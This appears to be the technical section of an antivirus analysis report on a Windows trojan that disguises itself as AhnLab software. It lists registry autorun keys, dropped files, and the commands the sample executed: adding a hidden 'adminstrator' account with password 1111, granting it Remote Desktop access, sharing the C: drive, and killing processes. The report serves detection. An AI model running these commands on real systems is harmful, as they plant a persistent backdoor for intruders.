Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'NextInstance' = '<SYSTEM32>\alg32.com'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'AhnLab Session Process' = '<SYSTEM32>\ACASP.com'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'AhnLab' = '<SYSTEM32>\AhnLab.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\AhnLab Application Service] 'ImagePath' = '%CommonProgramFiles%\AhnLab\ACA\ACAAC.exe'
- <SYSTEM32>\AhnLab.exe
- <SYSTEM32>\alg32.com
- <SYSTEM32>\ACASP.com
- <SYSTEM32>\net1.exe localgroup "Power Users" adminstrator /add
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" adminstrator /add
- <SYSTEM32>\net1.exe share dsc_UFG$=c:\
- <SYSTEM32>\net1.exe localgroup %USERNAME%s adminstrator /add
- <SYSTEM32>\cmd.exe /c C:\1.bat
- <SYSTEM32>\taskkill.exe /F /IM NavyShareCleaner.exe /IM NETENUM.exe
- <SYSTEM32>\net1.exe user /add adminstrator 1111
- <SYSTEM32>\VB6KO.DLL
- <SYSTEM32>\AhnLab.exe
- C:\1.bat
- <SYSTEM32>\Mswinsck.ocx
- <SYSTEM32>\ACASP.com
- <SYSTEM32>\ufg_dsc.dll
- <SYSTEM32>\alg32.com
- <SYSTEM32>\AdmDll.dll
- '4.#.1.58':80
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''